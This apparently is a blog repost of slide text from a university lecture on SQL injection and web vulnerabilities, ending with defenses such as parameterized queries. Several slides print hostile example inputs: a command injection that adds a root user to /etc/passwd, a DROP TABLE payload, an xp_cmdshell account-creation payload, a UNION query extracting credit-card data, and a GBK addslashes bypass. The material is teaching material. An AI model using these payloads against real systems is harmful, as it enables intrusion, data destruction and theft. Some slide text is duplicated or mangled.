常见的不安全网站信息包括来自SQL诸如,跨站脚本,伪造跨站请求等等,本文重点描述SQL注入的原理及防范机制。以及PHP语言的编程解决方案

小二郎发布于2018/06/16 00:00

注脚

1.1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009

2.Common vulnerabilities SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query XSS – Cross-site scripting Bad web site sends innocent victim a script that steals information from an honest web site CSRF – Cross-site request forgery Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site Other problems HTTP response splitting, bad certificates, … 2 Sans Top 10

3.Common vulnerabilities SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query XSS – Cross-site scripting Bad web site sends innocent victim a script that steals information from an honest web site CSRF – Cross-site request forgery Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site Other problems HTTP response splitting, bad certificates, … 2 Sans Top 10

4.Code injection using system() Example: PHP server-side code for sending email Attacker can post OR $email = $_POST[“email”] $subject = $_POST[“subject”] system(“mail $ email –s $ subject < / tmp / joinmynetwork ”) http:// yourdomain.com/mail.php? email=hacker@hackerhome.net & subject= foo < / usr / passwd ; ls http:// yourdomain.com/mail.php? email= hacker@hackerhome.net&subject = foo ; echo “evil::0:0:root:/:/bin/ sh ">>/etc/ passwd ; ls

5.SQL injection 5

6.6 Database queries with PHP (the wrong way) Sample PHP $recipient = $_POST[‘recipient’]; $ sql = "SELECT PersonID FROM People WHERE Username= "; $ rs = $db-> executeQuery ($ sql ); Problem: Untrusted user input ‘recipient’ is embedded directly into SQL command

7.Basic picture: SQL Injection 7 Victim Server Victim SQL DB Attacker post malicious form unintended SQL query receive valuable data 1 2 3

8.8 CardSystems Attack CardSystems credit card payment processing company SQL injection attack in June 2005 put out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed

9.April 2008 SQL Vulnerabilities

10.April 2008 SQL Vulnerabilities

11.April 2008 SQL Vulnerabilities

12.Web Server Web Browser (Client) DB Enter Username & Password SELECT * FROM Users WHERE user= me AND pwd = 1234 Normal Query

13.Web Server Web Browser (Client) DB Enter Username & Password SELECT * FROM Users WHERE user= me AND pwd = 1234 Normal Query

14.14 Even worse Suppose user = “ ′ ; DROP TABLE Users -- ” Then script does: ok = execute( SELECT … WHERE user= ′ ′ ; DROP TABLE Users … ) Deletes user table Similarly: attacker can add users, reset pwds , etc.

15.15

16.16 Even worse … Suppose user = ′ ; exec cmdshell ′ net user badguy badpwd ′ / ADD -- Then script does: ok = execute( SELECT … WHERE username= ′ ′ ; exec … ) If SQL server context runs as “ sa ”, attacker gets account on DB server.

17.17 Getting private info

18.Getting private info “SELECT pizza, toppings, quantity, date FROM orders WHERE userid =” . $ userid . “AND order_month =” . _GET[‘month’] SQL Query What if: month = “ 0 AND 1=0 UNION SELECT name, CC_num , exp_mon , exp_year FROM creditcards ”

19.19 Results Credit Card Info Compromised

20.Preventing SQL Injection Never build SQL commands yourself ! Use parameterized/prepared SQL Use ORM framework

21.21 Parameterized/prepared SQL Builds SQL queries by properly escaping args : ′  \′ Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped. SqlCommand cmd = new SqlCommand ( "SELECT * FROM UserTable WHERE username = @User AND password = @ Pwd ", dbConnection ); cmd.Parameters.Add (" @User ", Request[“user”] ); cmd.Parameters.Add (" @ Pwd ", Request[“ pwd ”] ); cmd.ExecuteReader (); In PHP: bound parameters -- similar function

22.22 0x 5c  \ 0x bf 27  ¿′ 0x bf 5c  PHP addslashes () PHP: addslashes ( “ ’ or 1 = 1 -- ” ) outputs: “ \’ or 1=1 -- ” Unicode attack: (GBK) $user = 0x bf 27 addslashes ($user)  0x bf 5c 27  Correct implementation: mysql_real_escape_string() ′

user picture
  • 小二郎
  • Apparently, this user prefers to keep an air of mystery about them.

相关Slides